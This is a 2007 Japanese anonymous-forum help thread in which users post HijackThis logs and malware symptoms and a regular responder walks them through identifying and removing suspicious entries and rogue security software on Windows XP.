O8 - Extra context menu item: SHARP ぺたっ!翻訳 - res://C:\Program Files\Sharp\PowerEJ\BIN\QuickTrans.ocx/234
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\YAHOO!J\MESSEN~1\YPAGERJ.EXE
O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\YAHOO!J\MESSEN~1\YPAGERJ.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www.spacetown.ne.jp/
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab
O16 - DPF: {4A88CB42-BBFE-496A-884F-98E8AC316292} (YJInstStarter Control) - http://dl.toolbar.yahoo.co.jp/dl/installs/yjinst.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1149661454587
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://go.divx.com/plugin/DivXBrowserPlugin.cab

134 :124:2007/01/11(木) 18:33:37
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1149661420909
O16 - DPF: {7A5F1DBB-5357-4601-8084-0B111A24BEE8} (EntoiSketch Program) - http://upload.cururu.jp/common/editor/EntoiSketchControl.cab
O16 - DPF: {8BCAB742-72F8-4119-A4B4-8F639A6E27B2} (CNaverImageUploadCtl Object) - http://myhome.cururu.jp/common/editor/NIU.CAB
O16 - DPF: {B905F63D-7489-4B3D-9B62-49A1B8647E2A} (HgPluginJP21 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP21.cab
O16 - DPF: {CDA94496-ED6F-4C72-94C8-2C485DC63390} (VCDS Control) - http://vcds-client.nefficient.co.kr/vcds-client/vCDS.CAB
O16 - DPF: {E0BE586C-7C66-4909-94D6-D18BBBDD6373} (ファイルバンクランチャー) - http://www.filebank.co.jp/setup/win/fbx2.cab
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O21 - SSODL: carbinyl - {8d8c2387-7f80-4022-9be6-43630a969558} - (no file)

135 :124:2007/01/11(木) 18:34:23
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: AVSync Manager (AvSynMgr) - Network Associates, Inc. - C:\Program Files\Network Associates\VirusScan\Avsynmgr.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McShield - Unknown owner - C:\Program Files\Common Files\Network Associates\McShield\Mcshield.exe
O23 - Service: ieupdater (Microsoft IE Updater) - Unknown owner - C:\DOCUME~1\ユーザー名\LOCALS~1\Temp\ieupdate.exe
O23 - Service: TabletService - Wacom Technology, Corp. - C:\WINDOWS\System32\Tablet.exe

136 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:54:10
1000まで続けるんですかね

137 : ◆N9P3SuvBPo :2007/01/11(木) 19:01:53
>128
英文メールのメッセージをググったら
シマンテックのサイトが出てきて、そのシマンテックのサイトを参考にした。
>レジストリ内にexplore exeが作られてるから
>しかし、ソレが無い!
と言うことは、感染はしていないと思いますが…
ノートン先生でスキャンして、このW32.Mytob.QU@mmというウイルスを
検出されたとき、どのような処置を取りました?

>129
いくつか問題のエントリーがあります。
さらにウイルス対策ソフトが重複されてます。
現在ログを解析中(飯の時間だ)なので今しばらくお待ちを。

138 :名無しさん@お腹いっぱい。:2007/01/11(木) 19:25:31
>>129
> C:\WINDOWS\System32\adirss.exe
> O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe

あやしいお





139 :124:2007/01/11(木) 20:00:04
>>137
ありがとうございます。待ってます。

>>138
それを調べてみたら、
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-w32.mixor.q@mm.html
が出ました。これっぽいです・・・。

140 :名無しさん@お腹いっぱい。:2007/01/11(木) 20:06:53
何処で聞いたらいいか分からないのでココで聞きます。
一応テンプレ

【使用OS】 WindowsXP Professional x64Edition
【MicrosoftUpdate】 してる
【使用セキュリティソフト】 なし
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】 corega CG-WLBARAG-P
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
WindowsXP Professional x64Editionに対応しているアンチウイルスソフトってありますか?
探してるんですけど・・・無い!ドコ?(T-T ))(( T-T)ドコ?


141 : ◆N9P3SuvBPo :2007/01/11(木) 20:14:46
充電完了!

>124さん
Avastとマカフィーが両方インストールされていますよ。
対策ソフトの重複はPCを重くする原因となります。
Avastが最新と言う事なので、マカフィーのほうをアンインストールしてください。
VirusScanという名前でコンパネ→プログラムの追加と削除にあると思います。

そしてもう1つアンインストール対象があります。
JWordという名前のプログラムです。
必要無ければ、アンインストール推奨です。

アンインストールが終了したら、セーフモードで起動してください。
セーフモード中はネットに繋げないので、以下の文はメモ帳にコピって参照してください。

コンパネ→管理ツール→サービス
一覧にieupdater (Microsoft IE Updater)という名前を探して、見付かったらプロパティ画面を開き、
サービスが開始されていたら、「停止」をクリックしてサービスを止めます。
さらにスタートアップの種類を「無効」に選択して、設定を有効にするため「適用」をクリックして閉じます。

142 : ◆N9P3SuvBPo :2007/01/11(木) 20:15:28
全ての窓を閉じてから、HijackThisを起動して
以下のエントリーをFIXしてください。(無くなっているものはスルー)
O2 - BHO: IdnHelperObj Class - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL ←JWord
O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe ←何らかのマルウェア
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203 ←JWord
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm ←Alexaツールバー
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm ←上記に同じ
O16エントリー全部(必要な物は再度ダウンロードすることが可能です)
O21 - SSODL: carbinyl - {8d8c2387-7f80-4022-9be6-43630a969558} - (no file) ←FIX対象です
O23 - Service: ieupdater (Microsoft IE Updater) - Unknown owner - C:\DOCUME~1\ユーザー名\LOCALS~1\Temp\ieupdate.exe ←上記の作業により無くなっていると思います。

ここまで終わりましたら、PCを再起動してF8連打でWindows拡張オプションを開いて
「ブートのログ作成を有効にする」を選択して、通常モードで起動してください。
ブートのログはC:\Windowsフォルダ内にntbtlog.txtという名前で作成されます。
ntbtlog.txtはアップローダにupってください。
それと症状の変化の報告も。

143 :名無しさん@お腹いっぱい。:2007/01/11(木) 20:19:31
http://www.rawmanga.com/

このサイト開いたらウイルスかスパイウェアがあったらしくバスターが反応しました
その後スキャンしたらウイルスを駆除できませんとでます・・・・新型でしょうか?

144 :140:2007/01/11(木) 20:50:19
自己解決しました

145 :名無しさん@お腹いっぱい。:2007/01/11(木) 20:57:41
ネットでの中傷・名誉毀損やプライバシー侵害について、ネット事業者や総務省が意見を募集中ですよ。


ネット上で "中傷・名誉毀損、プライバシー侵害、著作権侵害" をした人物の住所や氏名を、
同意なしで開示できるガイドライン(案)について、ネット事業者や総務省が意見を募集しています。

ネット上のプライバシー侵害や名誉毀損、発信者情報開示へガイドライン
ttp://internet.watch.impress.co.jp/cda/news/2007/01/10/14420.html

プロバイダ責任制限法ガイドライン等検討協議会
「プロバイダ責任制限法 発信者情報開示関係ガイドライン(案)」に係る意見募集について
意見提出期限
平成19年2月9日(金)正午
ttp://www.telesa.or.jp/consortium/provider/2007/20070110.htm

総務省(報道資料)
プロバイダ責任制限法第4条に基づく発信者情報開示制度の
円滑かつ適切な運用を支援する取組
ttp://www.soumu.go.jp/s-news/2007/070110_1.html

関連スレ
【ネット】 掲示板などで"中傷・プライバシー侵害"した人の住所・氏名、同意なしで開示へ…業界が新指針★9
http://news22.2ch.net/test/read.cgi/newsplus/1167340902/
【ネット】プライバシー侵害の書き込み、ISPが発信者情報を開示する基準を明確化 業界団体が新たなガイドライン[12/26]
http://news21.2ch.net/test/read.cgi/bizplus/1167133741/
「2ちゃん叩き潰す」だから総務省が意見出せってよ
http://news20.2ch.net/test/read.cgi/news/1168416480/



146 :モモ:2007/01/11(木) 20:58:36
ウイルスかどうか分かりませんがパソコン終了時に毎回「重要な更新をインストールしてコンピューターの電源を切るには
[電源を切る]をクリックしてください。」と表示されます。
これは、前までは1ヶ月に1回ぐらいしかなかったのですが毎終了時に表示されるようになりました。
これは、ウイルスが入ったからなのでしょうか?



147 : ◆N9P3SuvBPo :2007/01/11(木) 21:02:35
あっ!
>131見逃していたエントリーです
O2 - BHO: (no name) - {67982BB7-0F95-44C5-92DC-E3AF3DC19D6D} - C:\Program Files\Video ActiveX Object\isaddon.dll (file missing)
こちらもFIX対象となります。(通常モードでも問題無くFIXできるかと(全ての窓を閉じた状態で))
すいません…

148 :名無しさん@お腹いっぱい。:2007/01/11(木) 21:30:13
>>124
> 【症状が出る前に何をやったか】
> mixiの登録画面を開いた

こんなんで感染するの?

149 : ◆N9P3SuvBPo :2007/01/11(木) 21:39:12
>148
考えられない

150 : ◆N9P3SuvBPo :2007/01/11(木) 23:17:47
明日の夜また来ます。

151 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:19:46
>>146
WinUpdate
>>148
登録画面だけなら今のところNo,

152 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:40:31
パソコンが変になったので携帯からなんですが
今共有ファイルによくわからないまま初めて挑戦したのですがいきなり感染してしまいました。
OSはWindows XPでルータはなしです。
後よくわからないのですがSpywereと書いてありました
どうすればいいか教えてください、かなり焦ってます

153 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:52:19
>>152
Spybotなどのアンチスパイウェアソフトで駆除

154 :名無しさん@お腹いっぱい。:2007/01/12(金) 00:08:31
>>153
ありがとうございます!
TrustyFiles等を使うときはルータとかないとやらないほうがいいんでしょうか?
使うにあたって気をつけなければいけない事ってありますか?無知ですいません

155 :名無しさん@お腹いっぱい。:2007/01/12(金) 00:45:59
初心者はやめとけとしか
むしろその手のソフトは自己責任

156 :名無しさん@お腹いっぱい。:2007/01/12(金) 01:43:16
>>155
分かりました。
それと今Spybotダウンロードしようとしたのですが接続しようとすると強制終了してしまうんですがどうすればいいでしょうか?
今一応Dr.WEBはあるんですが

157 :名無しさん@お腹いっぱい。:2007/01/12(金) 07:23:36
>>156
>接続しようとすると強制終了してしまう
セキュリティソフトに問題ないなら再インストールor ad-awareにする
> 今一応Dr.WEBはあるんですが
それが駆除してくれないから入れたのでは?

158 :名無しさん@お腹いっぱい。:2007/01/12(金) 09:35:20
自分はインターネットを普段やっているのですが。
親のパソコンとは別に一階の部屋から電波を飛ばしたのを
キャッチして自分のノートパソコンでインターネットに
接続しています。
この場合に自分がウイルスに感染した場合に
親のパソコンに影響が出る事は考えられますか。
あったらどのようなものなのか教えていただけたいです。

自分のパソコンで対策ができていなくて
親のパソコンでできている場合はどうなりますかね?


159 :困った素人:2007/01/12(金) 09:45:13
【使用OS】 WindowsXP SP2
【MicrosoftUpdate】 はい
【使用セキュリティソフト】Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
感染: Trojan-PSW.Win32.VB.hb スキップ
感染: Trojan-PSW.Win32.VB.hb スキップ
疑わしい: Exploit.HTML.Mht KLに送信
疑わしい: Exploit.HTML.Mht
【どんな症状が出るか】
明確な症状がないですが、最近重たくてネットサーフィンすると接続まで時間が掛かります。
【症状が出る前に何をやったか】
【その他の質問】検出されたウィルス等は、Norton Internet Security で検出されず、カスペルスキーのサイトでの無料検出スキャンの結果のものです。
他のサイトでの無料スキャンでも検出されず、カスペルスキーの無料スキャンのみで検出されました。
はたして、どちらの結果を信用してよいのでしょう?
素人質問ですいませんが、教えていただけたか幸いです。


160 :名無しさん@お腹いっぱい。:2007/01/12(金) 11:26:05
昨日、>>128で質問させてもらった者です。
その後色々と調べてみたんですが、どうやらコレの様です。

http://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.mydoom.bu@mm.html

で、今の段階では「ACCOUNT ALERT」なるメールが送信されてきて、
その本文に含まれているリンクをクリックさせようとしているのですが、
さすがにクリックはしていないんです。
ですのでノートンが実際に反応した訳でもなく、今の段階ではレジストリを改変された訳でもない様です。

お騒がせいたしました。

161 :名無しさん@お腹いっぱい。:2007/01/12(金) 13:02:37
>>158
共有フォルダやファイルがあればYes,
無いなら下は「自分だけOut」
>>159
スパイウェアチェックor手動削除

162 :名無しさん@お腹いっぱい。:2007/01/12(金) 13:06:16
age

163 :困った素人:2007/01/12(金) 13:10:08
>>161
Ad-Aware SE Personslでは検出されませんでした。

164 :名無しさん@お腹いっぱい。:2007/01/12(金) 13:15:33
>>163
Ad-Awareが優秀とは限らない

165 :名無しさん@お腹いっぱい。:2007/01/12(金) 14:18:45
>>164
そんな事言ってたら、どんな対策ソフトも優秀とは限らない

166 :158:2007/01/12(金) 14:51:49
>>161レスありがとうございます!!
共有フォルダやファイル とはどういったものをさすのかがわかりません・・
自分はインターネット以外でパソコンを使っていないんですけど
共有フォルダやファイルをもっているということは
あるんでしょうか?








167 :名無しさん@お腹いっぱい。:2007/01/12(金) 14:57:43
>>165
優秀で無いとも言ってはいない
固執しているから書いただけ
他のも試せばいいだけのこと
反応する物もあればしないものもある

168 :名無しさん@お腹いっぱい。:2007/01/12(金) 14:58:51
>>166
普通は設定しない限り無いのでは?

169 :>>123:2007/01/12(金) 15:09:08
>>127
ありがとうございます!
無料スキャンしたところ、疑わしいのが12個、感染してるのが1個見つかりました・・・
疑わしいファイルはいずれも2ちゃんねるの壺のログの中から見つかったのですが、
これってどういうことなんでしょうかね・・
感染していたということなのでしょうか
一応12個とも手動で削除しましたが・・
あと感染していると出たプログラムが何とウイルスバスター2006なんです(゜д゜;)
どうすれば・・プログラムごと削除したらいいんでしょうか
いつの間に感染したんだろう・・
C¥Program Files¥TrendMicro¥VirusBuster2006¥26.tmpと出たのですが
どなたか教えてください お願いします・・

170 :名無しさん@お腹いっぱい。:2007/01/12(金) 15:31:01
壮大な釣りだったのか?

171 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:14:19
ウィルスやスパイウェアのデメリットは駆除する時間がめんどくさいだけでしょうか?
ウィルスやスパイウェアにかかったときに困る事は他にありますか?

172 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:26:51
ファイアーウォールソフトが、マザーボードについてきたノートンをインストールして再起動した直後に
ccApp-Client and Host Security Platform
このアプリケーションがネットワークへのアクセスを試みていると警告出してきました。
これはノートンのだから許可していいんですか?

173 : ◆N9P3SuvBPo :2007/01/12(金) 18:29:40
>169
>2ちゃんねるの壺のログの中
これか?=Exploit.HTML.Mht
いわゆるノートントラップって奴だ。
2chブラウザのログから検出されることはこれからもあるかもしれないが、
感染はしないから安心しろ。

そして
>C¥Program Files¥TrendMicro¥VirusBuster2006¥26.tmp
こちらは何と言う名前で検出された?

174 :名無しさん@お腹いっぱい。:2007/01/12(金) 18:47:46

¥QUARANTINEの悪寒


175 :>>123:2007/01/12(金) 19:15:39
>>173
本当にありがとうございます!
名前はわからないですけど>>174さんの言ってるとこです・・・
言わなくてもわかるってことは相当ヤバイんですかね・・
あとウイルスバスターの感染はどうしたら・・


176 :名無しさん@お腹いっぱい。:2007/01/12(金) 19:19:30
tp://satoumizu.net/
ここ見ようとしたらAVGが反応したんですが大丈夫でしょうか?
VBS/Reldrofってウィルスみたいです。

177 :名無しさん@お腹いっぱい。:2007/01/12(金) 19:24:24
      r;ァ'N;:::::::::::::,ィ/      >::::::::::ヽ
.      〃  ヽル1'´        ∠:::::::::::::::::i
       i′  ___, - ,. = -一   ̄l:::::::::::::::l
.      ! , -==、´r'          l::::::/,ニ.ヽ
      l        _,, -‐''二ゝ  l::::l f゙ヽ |、    どんなウイルスよりも、
        レー-- 、ヽヾニ-ァ,ニ;=、_   !:::l ) } ト
       ヾ¨'7"ry、`   ー゙='ニ,,,`    }::ヽ(ノ     2ch閉鎖の方が恐ろしい。
:ーゝヽ、     !´ " ̄ 'l,;;;;,,,.、       ,i:::::::ミ
::::::::::::::::ヽ.-‐ ト、 r'_{   __)`ニゝ、  ,,iリ::::::::ミ      
::::::::::::::::::::Vi/l:::V'´;ッ`ニ´ー-ッ-,、:::::`"::::::::::::::;゙ ,
:::::::::::::::::::::::::N. ゙、::::ヾ,.`二ニ´∠,,.i::::::::::::::::::::///
:::::::::::::::::::::::::::::l ヽ;:::::::::::::::::::::::::::::::::::::::::::/ /
::::::::::::::::::::::::::::::! :|.\;::::::::::::::::::::::::::::::/ /


178 :名無しさん@お腹いっぱい。:2007/01/12(金) 19:25:39
>>175
¥QUARANTINEとは隔離フォルダのこと
つまりバスターが既に検出し隔離したマルウェアをカスペルスキーが検知しただけ
問題ないよ

179 :>>123:2007/01/12(金) 19:58:41
本当ですか!?
カスペルスキー・・?(゜д゜)
検出した26.tmpも削除しとかなくていいんですか?

180 :名無しさん@お腹いっぱい。:2007/01/12(金) 20:05:41
>>179
あれ カスペルスキーオンラインスキャンやったんじゃなかったの? 違うオンラインスキャン?
どっちにしろ バスターが既に隔離してるからそのままでもいいけど
気になるんなら隔離されたやつを完全に削除すればもうでてこないよ
俺はバスターユーザーじゃないからやりかたはオンラインヘルプでも読んでクレ

181 :>>123:2007/01/12(金) 20:23:10
あ、そうでした・・すみませんぼけてましたorz
教えてくれてありがとうございます
結局なんてウイルスか、どんな作用をしたのかはわからないままですね・・
今は隔離されてるとわかって一安心ですが、感染してたってことはもう手遅れ・・(´・ω・`)
個人情報バラまいたりされてないかすごく不安です・・

182 :名無しさん@お腹いっぱい。:2007/01/12(金) 20:40:40
>>181
いや あのね
隔離フォルダからしか検出されてないってことは感染前にバスターが自動的に隔離してくれたってこと
そういう状態は感染とはいわず保菌という状態に近い 
なんてウイルスかはバスターのウイルスログにウイルス名が書いてあるからググルなりして調べんさい











てか 俺つられた?


183 : ◆N9P3SuvBPo :2007/01/12(金) 21:18:59
それよりも昨日のもう一人の質問者の行方が気になるところだ…

184 :182:2007/01/12(金) 22:37:21
>>181
よく考えたら感染してないとは言い切れないね
単独で活動するやつで感染後にバスターのupdateで対応された新種とか
ネタかもしれんけど ウイルス名でぐぐって挙動を確認してその症状があったか確認するしかないね
ほんじゃ
 

185 :名無しさん@お腹いっぱい。:2007/01/12(金) 23:30:54
ウィルスを保存しておいて後々必要となった時に戻せる様にしてあるだけじゃない?
(誤検出しても所定の操作でもとの場所にファイルを戻せるから)

186 :>>123:2007/01/13(土) 01:28:55
遅くなってすみません・・ いろいろありがとうございます
バスターの隔離ってとこを見てみたら eicar[1].comって・・
どんなウイルスかを調べてみたら・・テストファイルって・・
どういうことなんでしょう
感染した時間を見ても多分このウイルスだと思うのですが・・

187 :名無しさん@お腹いっぱい。:2007/01/13(土) 09:23:44
いい加減ググれ

188 :名無しさん@お腹いっぱい。:2007/01/13(土) 09:31:39
>>186
ttp://www.google.com/search?hl=ja&q=eicar%5B1%5D%2Ecom&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

189 :名無しさん@お腹いっぱい。:2007/01/13(土) 12:52:15
早く休みおわんねーかなぁ・・・

190 :名無しさん@お腹いっぱい。:2007/01/13(土) 20:45:35
ノートン2006の中古がヤフオクに出ていますが
既に使用済み(アクティブ化済)のものが含まれています。
使えないのになぜ買うのでしょうか?

191 :名無しさん@お腹いっぱい。:2007/01/13(土) 21:40:34
どなたか、デスクトップにドクロマークが出るウイルスの対処方法をご存知ありませんか?携帯しか使えずに困っています。

192 :名無しさん@お腹いっぱい。:2007/01/13(土) 21:56:58
リカバリ

193 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:16:50
>>190
セキュリティ初心者質問スレッドpart80
http://pc10.2ch.net/test/read.cgi/sec/1167252179/432

432 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/01/13(土) 21:06:44
ノートン2006の中古がヤフオクに出ていますが
既に使用済み(アクティブ化済)のものが含まれています。
使えないのになぜ買うのでしょうか?

194 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:17:26
>>190
売ってるから?欲しいから?

195 : ◆N9P3SuvBPo :2007/01/13(土) 22:33:43
>191
またかよ

セーフモードで起動

Alt+F4連打していればそのうち起動できる
とりあえずここまで

196 :名無しさん@お腹いっぱい。:2007/01/14(日) 01:47:29
>>191
前スレ見れるなら見てみ。
195氏やみんなでドクロの善処策の書き込みあるから。
できることなら、リカバリが手っ取り早いよ。

197 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:28:16
【社会】モーニング娘。吉澤ひとみさん号泣…16歳弟が東京・新宿で交通事故死★3


ttp://nexx.jp/crashme.html

これ踏んだらマズいっすか??

198 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:29:30
変なソフトをインストールしようとしたり、ポップアップ広告を出してきたり、詐欺サイト(多分)を表示します
何度消そうとしてもなかなか消えません。非常にしつこいです。
最新のパターンファイルに更新したウィルス対策ソフトを使っても検出されません(ノートン、ウィルスバスターオンラインスキャン)
また、スパイウェア対策ソフトでも同様です(Spybot Adaware se)

【使用OS】XP Home SP1
【MicrosoftUpdate】 常に最新のものに更新しています
【使用セキュリティソフト】 ノートン インターネットセキュリティ 2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 常に最新の状態に更新しています
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Dialer. Traffic advance
【どんな症状が出るか】 IEを立ち上げると英語のメッセージで「ウィルスに犯されています」
            みたいなメッセージが表示されて「キャンセル」を押しても詐欺サイトのHPを開く
            その他、変なソフトをインストールしようとしてきて、「いいえ」を選んでも何度も繰り返す
【症状が出る前に何をやったか】 画像掲示板で番号をずらしながら表示したらウィルスにひっかかった
【症状を解決しようとどのような処置を取ったか】感染した時に何もウィルス対策ソフトを入れてなかったので導入した
                       また、導入するまではオンラインウィルススキャンで手動で感染ファイルを削除

ちょっと前からは激しい症状が出る時はノートンが反応するようになったけど、基本的には反応しません
なお、IEを使用してない状態では何も症状は出ないようです。
IEを立ち上げる時に時間がかかり、一瞬ウィンドウが非アクティブの状態になります。

どうかよろしくお願いします

199 :名無しさん@お腹いっぱい。:2007/01/14(日) 04:48:45
>>198
俺もつい先程まで多分それと同じ症状が出た。
SpybotとAdawareでも駆除は無理だったけど、↓これ導入したら駆除できたよ。

「SUPERAntiSpyware」
ttp://www.superantispyware.com/

200 :名無しさん@お腹いっぱい。:2007/01/14(日) 04:58:53
>199
ぐぐったらなんか凄そうなものですね。
一度試してみたい。

201 :名無しさん@お腹いっぱい。:2007/01/14(日) 08:08:04
>>198
セキュリティインスペクタしてなかったの?

202 :名無しさん@お腹いっぱい。:2007/01/14(日) 12:13:03
>>199
本体がトロジャンって認識されるってw

203 : ◆N9P3SuvBPo :2007/01/14(日) 18:37:41
>198
SmitFraudFix使ったほうがいいかな。

204 : ◆N9P3SuvBPo :2007/01/14(日) 19:12:06
しかし、感染してからセキュリティソフトを入れても無意味に等しいからな…

205 :名無しさん@お腹いっぱい。:2007/01/14(日) 19:36:26
>>201 203 204
自己解決しますた
カスペルスキーのオンラインスキャンで感染ファイルを検出

以前感染した際に手動で削除しようとしてできなかった感染ファイルを検出
セーフモードで削除しますた

で、以前のように快適にネットができてます
これからは気をつけなくては‥

206 :名無しさん@お腹いっぱい。:2007/01/14(日) 19:42:03
>>198
> 【使用OS】XP Home SP1
sp2にしたほうがいいんじゃないの?

207 :名無しさん@お腹いっぱい。:2007/01/15(月) 03:12:23
【使用OS】 WindowsXP SP1
【MicrosoftUpdate】 最新です
【使用セキュリティソフト】 WinFixer 2006
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 有ります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Cookieと言われるウイルスが1件のみ
【どんな症状が出るか】 PCが非常に重たくなり、通常の作業に支障が出る
【症状が出る前に何をやったか】 WinFixer 2006をインストール
【症状を解決しようとどのような処置を取ったか】
F-Secure InternetSecurity 2006を消してWinFixer 2006を入れた
【その他の質問】最強のソフトで軽いという謳い文句でサイトに書いてあったのに、
こんなにPCが重くなるなんて考えられません。
メモリは2G積んでいます。
どうしたらいいのか何も分からないまま、WinFixer 2006を購入しました。

208 :名無しさん@お腹いっぱい。:2007/01/15(月) 04:32:45
ま、釣りだろうけど。
http://pc10.2ch.net/test/read.cgi/sec/1134850825/

209 :名無しさん@お腹いっぱい。:2007/01/15(月) 15:27:20
          ,. -‐v―- 、
                  ヽ
        /  //_/ノハL!L!i
     r‐、 i  彡       .i ,-ァ
     ヽ ヽ!_ 彡 fて)  fて) .Y -く
      [i 6 ●( ヽ  ^ __,. ●ト、/ <喰っても不死家から黙って喰え。
      . ト-' 、  `  ̄ ̄  .ノ      
          >  ___ <_
        /ヾ ヽ   ヾ ヽ\
       /   | ◯ ̄ ̄ ◯ |/ヽ

210 :名無しさん@お腹いっぱい。:2007/01/15(月) 20:37:45
今スパイウェアを駆除しようと友達のPCからSpybotをダウンロードしてきたんですが
インストールしてスキャンしたらなぜかエラー(You need install…)がでてきてスキャンができないのですがどうすればいいでしょうか?

211 : ◆N9P3SuvBPo :2007/01/15(月) 21:30:46
>210
正しくはSpybot-S&Dな。(Spybotでも通じるから良いけどw)
そもそも、Spybotは感染を予防するために入れるんだぞ。
Spybotだけじゃなくて、セキュリティソフト全般にも言えることだけど。

セーフモードで起動してやってみろ。

212 : ◆N9P3SuvBPo :2007/01/16(火) 17:57:18
この前の質問者、何の音沙汰も無しというのが気になるんだが。

213 :名無しさん@お腹いっぱい。:2007/01/16(火) 18:40:49
>>212
多分、解決したんじゃないのかな。
報告もないとは、いかんとも寂しいね。

214 : ◆N9P3SuvBPo :2007/01/16(火) 19:16:01
>213
だと良いんですがね。

>141-142、>147
で、>142の最後の行に症状がどうなったか報告してほしいと書いてあるのに、
何故か返事が無いんですよね。
もしかしたら、自分の指示がどこか間違っていて何らかの不具合が起きて
しまっているのでは?と思っているんですが。

215 :名無しさん@お腹いっぱい。:2007/01/16(火) 19:52:21
ウィルスバスター2007でスパイウェア検索をしたところ
TSPY_WINNYというのが発見されました
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FWINNY

感染していた .exe .dllなどのファイルを削除したうえで
スパイウェア・ウィルス検索を実行し、特に何も検出されませんでした
感染したアプリケーション.exeを実行した可能性がありますが

is disguised as an application that aids spyware's installation

スパイウェアのインストールを支援するアプリケーションと偽ります?

何をされるの?

TSPY_・・・ は情報漏洩やらするやつらのことみたいだけど。

(トロイの木馬4台目はたたないの?)

216 :213 :2007/01/16(火) 20:43:00
>>214
逆に理解不能だったかも。(藁
ともあれ自分もよくROMらせて頂いて
おりますが大変勉強になります。
(おかげでかなり助かっております)
(ノートンで以前困った【別スレ】)

あんまり気にしなさんなって(・ω・)ノ、しかし
セキュリティ板は回答する方が難しいねw
俺から言わしたら、複合的な要因大杉です

「リカバリしろ!」と一言でなんてめったに言えた
もんじゃないですから。。。

この板の真意はやはり高度なテンプレに
意味があるんだと思います。実際ウィルス
に感染しなきゃわからない事だらけですから。もちろん感染しない事に、こしたことは
ないです。


217 : ◆N9P3SuvBPo :2007/01/16(火) 20:53:31
>216
慰めの言葉ありがとうございます。

このスレのテンプレは前スレで、俺が作ったものです。
まだ修正・追記箇所がありますが、あまり複雑にし過ぎると、
今度は質問する側が参ってしまうかもしれないので。

ちなみに「リカバリしろ!」は言う時だってありますよ。

218 :210:2007/01/16(火) 23:50:04
返答しなくて本当にすいませんでした。
今は携帯からしかできないし、直ってから報告しようと思っていたのです
実はまだセーフモードで起動してからスキャンしても同じ結果になってしまうのですがどうすればいいのでしょう?

219 : ◆N9P3SuvBPo :2007/01/17(水) 00:10:10
>218
セーフモードでもダメなら…んん?
でもなんでSpybotを使おうと思ったの?

